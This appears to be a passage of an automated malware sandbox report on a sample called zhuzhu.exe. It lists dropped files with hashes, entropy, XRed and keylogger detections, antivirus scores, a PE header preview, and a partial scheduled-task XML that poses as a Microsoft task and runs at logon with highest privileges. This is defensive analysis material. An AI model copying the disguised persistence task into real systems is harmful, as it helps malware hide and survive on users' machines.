                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6304
                                                                                                                                                                    Entropy (8bit):3.712771924555677
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJVxn6OuQYiSoxI7pDH89bwdsfKQm:R6lXJr6OuQYgdwWf8
                                                                                                                                                                    MD5:9CC4B1A1AFA2D5A4CB64D2DF69BC0AB5
                                                                                                                                                                    SHA1:C74C752FFC46BC940C4B013A2D801BBA6F1CA499
                                                                                                                                                                    SHA-256:E7EEA4D33322EE2A7B518A7628591B813CADBBB3E9223C1B371356F397512CDF
                                                                                                                                                                    SHA-512:4FAA871DC264C3C97F64AF92693501E1CD949B5E39114788340F323073247212B55DE539A39E2A62483AD557933335E22F27EF9747524FA5062A189A926A5CE1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                     Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5780</Pi
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4572
                                                                                                                                                                    Entropy (8bit):4.439458351406917
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsIJg77aI9OJWpW8VYGYm8M4JFCFx+q840TR2Z3d:uIjfOI7Y47VSJkCt2Z3d
                                                                                                                                                                    MD5:6D68AD6C735D7BBD82FFE14F479C2B3D
                                                                                                                                                                    SHA1:F806E9DA51E36BED9DCD7D02CE85C8A63274911A
                                                                                                                                                                    SHA-256:22762043A4AE11D81D953F60C7EC34EC23190877CEC3DF9F4F3A45993DE57ABB
                                                                                                                                                                    SHA-512:FED4C04184E18C7149EE95D8FD84EE6FE00A757A6FC8B03A3A2E3580DC30063B9AFE061688F145DCF855C80CB033A7135F6D14072686EEE7935D333BD5F04A4A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653462" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6318
                                                                                                                                                                    Entropy (8bit):3.7147503597477587
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJVxK6JAeYiSNbprE89bIdsfPYm:R6lXJG6XYlnIWfV
                                                                                                                                                                    MD5:3DB61FBC41D8034B5B338AE2EC43B3CF
                                                                                                                                                                    SHA1:F742A3632A7752865F1E37FAB9CD57561F39D259
                                                                                                                                                                    SHA-256:F8ACA9BE36E540B6A2B6D28CDC89E46282C1AA60E572BD75F9990821A1356607
                                                                                                                                                                    SHA-512:4F1E88B1F44BC7E195115942DA70A885E927133798456CEC48F8F2D4615D5ED899E0305EB32C413F05006360FFE473374E6BF9542D4F1B83FB18465C09C40004
                                                                                                                                                                    Malicious:false
                                                                                                                                                                     Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5780</Pi
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4572
                                                                                                                                                                    Entropy (8bit):4.441261713228417
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsIJg77aI9OJWpW8VYrYm8M4JFbFn+q845TR2Z3d:uIjfOI7Y47V3J7Lt2Z3d
                                                                                                                                                                    MD5:EDD9F542C202E3AA9B57702B955C608D
                                                                                                                                                                    SHA1:0CEE4B9B20483F6AC2CE3D20B26CD14F172D5820
                                                                                                                                                                    SHA-256:37A10D1A3140D3D37F304620063FBFAD165A5B80C40159C2D3A385160E759753
                                                                                                                                                                    SHA-512:2CE4E10B09930B4A007A29A173D812F93F3D86A219056DA2B034718B2E5EED1EEC1719FFC2DADBB51B6E54DBB0856F9A8DEDD705F0831B06C14AEDC6D0BA4E5E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653462" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 04:00:08 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4028232
                                                                                                                                                                    Entropy (8bit):2.3021504157883053
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:O5saXsQa2NNhFGJxAwZy0xH1EZEO8g7gSsTsiq2:O5shQxNeyi1t
                                                                                                                                                                    MD5:432EDDE0D89D62355791E4FC936479B8
                                                                                                                                                                    SHA1:B0AD09BE65376B8A1EAEE5E1A52145176A9DFB89
                                                                                                                                                                    SHA-256:DE87A384FCA6D88A0412A0A47DAD7227FED98506361D38A742AD941CD5C8D002
                                                                                                                                                                    SHA-512:9DBFE7651C23F61E480561637EB666FC6AB586E8146FDB4BBECE28F27E86C8B9893450DEB4E2026DF88E52CD649CFAB30572354D0F7A007D79C50AC6E8EA6FAD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):771584
                                                                                                                                                                    Entropy (8bit):6.641700569488142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IAr:ansJ39LyjbJkQFMhmC+6GD9/
                                                                                                                                                                    MD5:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    SHA1:7A3922C6DE7B42483E48644C917ADA5467FD1A44
                                                                                                                                                                    SHA-256:F2927C106573A6D3594AD58A3B5976C9E82964BF4D064821ABE4D3D58EF82479
                                                                                                                                                                    SHA-512:D6F0094332CE7D2C6CBC46B41EA71871DFDB9148F5C5E1C96C8F79E752543A59B6EF85FF6B26148A2ADBB605792392221383624087987BE280DC625A66048E78
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6061056
                                                                                                                                                                    Entropy (8bit):7.174885705168195
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:unsmtk2asgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvD:wL8Z9HhxRVwJMAqoetRqA9D
                                                                                                                                                                    MD5:675F03DB23D403573A3A6F708A0E4369
                                                                                                                                                                    SHA1:78EE9AFAFE6BF18D2C42D816629B6F9ED1E3EA2F
                                                                                                                                                                    SHA-256:EE4C8A187E1E1BD62ABE49FAECE1F327DC7718C736DD1E427C025D73FA796CF8
                                                                                                                                                                    SHA-512:C9055873FCBCEFD7AEB8414627D4AA7645014BC2A609A4993317A45465A2FFDBEB38DBFB6C7677350203FE1E7D1F3906FC670AE74D1A75FBD91533044F513240
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4118496
                                                                                                                                                                    Entropy (8bit):7.743814085153487
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                    MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                    SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                    SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: QQyisSetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1893
                                                                                                                                                                    Entropy (8bit):5.212287775015203
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                                                                    MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                                                                    SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                                                                    SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                                                                    SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                    Entropy (8bit):7.46325903759004
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                    MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                    SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                    SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                    SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                    Entropy (8bit):7.46325903759004
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                    MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                    SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                    SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                    SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Generic INItialization configuration [360Safe]
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                    Entropy (8bit):5.54815735280418
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:9QQ08ETkByYcqQZLTvOIuAALne2toBFjlVH:9QUETacqQJWIdAzxtonlV
                                                                                                                                                                    MD5:CB13859BCE5ADF79C6B2E1C4601FA06A
                                                                                                                                                                    SHA1:5562D46E7FBD8A3FF92AFE2270B23F5E73FF45D7
                                                                                                                                                                    SHA-256:601CFCA4A7123503331D7641666F7F48164AEB2494B007ECE4C8880F51AF6E2D
                                                                                                                                                                    SHA-512:C355FAE3C70B875A08F4BA8BC7D9463D5DB686D2113970F0ED17A5D723DA2ADF82334AFAF3345AABB51A2A89873C15926341AA18D90FF374FA1FB68B82BF3AC4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:[360Installer]..SlideShowResourceURL=http://down.360safe.com/360safe/slideshow_new.cab..From=h_inst..Product=360Safe....[360Safe]..Name=360........Pid=h_inst..FID=setup_13.0.0.2008k..Version=13.0.0.2009..RegVersionFile=360Ver.dll..IsBeta=0..Urls=pdown://b2=100027000|p2=B0A12507C5F7FB22D8E1EB5B2682074BD0218EF0|p3=20|p7=15|c2=1|b5=360......|b6=........|b7=5|b9=1|http://dl.360safe.com/setup_13.0.0.2008k.exe..MD5FileID=E901BD5EEF684DD36520382E5FC26236..SetupParam=/pid=h_inst /noreboot=1 /installer=1 /S..SlideShowImage=360safe_1.png,360safe_2.png,360safe_3.png,....[360signdata]..sign=0100000094BB9E7DD93895D39142938A10B443920CBE15CC1E5C20E47CA37526F047D27B4EE9567798C27E09EB3C005E187E0CE1A9B7EA4C2DA5D92120A8B6ABEBF270462455BBA3FD1AA5ACE5C44196EF1083BB9FAEDAD4C74F82DEFB96A173B5519816D7C03F06C87BAC684A0CF6FB459E487DCDEF38C3AF0864CB102E42D0FF3412A0
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):17
                                                                                                                                                                    Entropy (8bit):2.409267252251469
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lsS+n:U
                                                                                                                                                                    MD5:983514E15961BFDA71A616E3CA412147
                                                                                                                                                                    SHA1:8A938B2349A33CB8A45975F5E1084AC4ED702C72
                                                                                                                                                                    SHA-256:D22207FA67A53E84F79BEB0C103430CCAC7A6D6EEC028262135DDE91079F5566
                                                                                                                                                                    SHA-512:2C3D100D47A806CCB23F9ABCE816869C80B21EF6B6479C5A7BDEE47F9B14FCD004EE99F30ECC39A60AE35B1ADB0D4DAC52E58DABDB1885940A8888AC1E61B60E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.270787698355859
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+yv+pAZewRDK4mW
                                                                                                                                                                    MD5:88C0E33BC5E2509956CD2C1311F82BF5
                                                                                                                                                                    SHA1:90143737D8A950A1209807E1B7552B80471BAAD9
                                                                                                                                                                    SHA-256:13E090F2FB1C1FD1E27DF5CDEF86A3FB07EB1312E086822A93637204399B9E90
                                                                                                                                                                    SHA-512:491C6DA0AF2775FCF7E65207FC6B52E394F2F352191F2A3AE44EAA7B7D27D8C81DEF1A188D6762F0801A5C78DEE629FC858D8E95BA21E3FC738F8C0A69BFEAB8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1nQN_v4YCHmLYlVdyjVAXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.259566156861248
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++G+pAZewRDK4mW
                                                                                                                                                                    MD5:18595591767792A3EBBFCA9C1C2D60E1
                                                                                                                                                                    SHA1:FB39DA221E044B6C58BB54EE2FACF2A2FA865553
                                                                                                                                                                    SHA-256:F12F7B730AE6983D51D464FC285F61B5F050D7A9ADC52BDA69CF79270C33EA63
                                                                                                                                                                    SHA-512:D97C72EFBCBCC8DDEAC355148602DA49E75000025BD84B8CB4C42C37D1EDFB4126CDBEDD193A8929ACDE126C61617DFAA1B172DC1A44E24BC6F257E4F332B7E0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.266452356441095
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0yjSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7j+pAZewRDK4mW
                                                                                                                                                                    MD5:535D9655724AD55561FBABDE3290458F
                                                                                                                                                                    SHA1:5323DF612FAE8DFCD2BE7C16542B111EDB845CFE
                                                                                                                                                                    SHA-256:2DAC706785B722A95C71F1AD0BC80AD169E9A370FAF72DCEFAF2C4957E0240F3
                                                                                                                                                                    SHA-512:BF92D03B462DA51CDC487794378C0AB51997BC6507EDE2397D42E269D64DBBB8C14624C254C956BEB8E496451F6427D4E1DCFD4792639AC76B7569DEE8338359
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.256848466454581
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                                                                                    MD5:A9BE7D95A66EA36234A5C5B67275DB30
                                                                                                                                                                    SHA1:E4517E406B5912AD32B02A7D0E63D833F164C3EA
                                                                                                                                                                    SHA-256:90ADCB01D6885EEDCCAAFA1E74F997BADCC16548B61E05DB3FBCD82CBD3D8FE9
                                                                                                                                                                    SHA-512:46D4BA95FFEA8C85D3717765DC263053D43640C0989689B7042B34CCC6211416E93FE108FD8C5C7F9639114FA4FC3294AC65BC9396308BA0B6D34B320556858B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2618618261365695
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0JvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Kv+pAZewRDK4mW
                                                                                                                                                                    MD5:0D70ABBC1DC9261F754E20A9657F5008
                                                                                                                                                                    SHA1:2F8427068AECDB95DAA6EA484B6CA37F8ED1FD77
                                                                                                                                                                    SHA-256:D59ABDAFD05E56AA19504BCBF031C0D4EDC5855C8D114EA7C03978D4DC43AB34
                                                                                                                                                                    SHA-512:4DC7FDE629A0980F6488E762074E2CDD82522554798638DC1788FE688FF14AB04AD01327529EF6E44FB760B4DAC963223A4A98B6DBD778CFA27A310100708E68
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2558408834237085
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                                                                    MD5:F1E2892C0454D6F0AE9BA9206C3B3FEC
                                                                                                                                                                    SHA1:12930253CB83744EFEEF2749F7A4AB35BD366630
                                                                                                                                                                    SHA-256:3086BE961624BA1A1F1F06FAB5B98B7E67F85BF13ABA4C2A0546FFB09B4D90A4
                                                                                                                                                                    SHA-512:C989DA7F67738F331C1C6397E762D733108DD7BDE87E7A896767346FFB8B725A71E955939FEC5C5AACDEE45D676A9546741748C19FFB92A67271F367AE0FABEB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
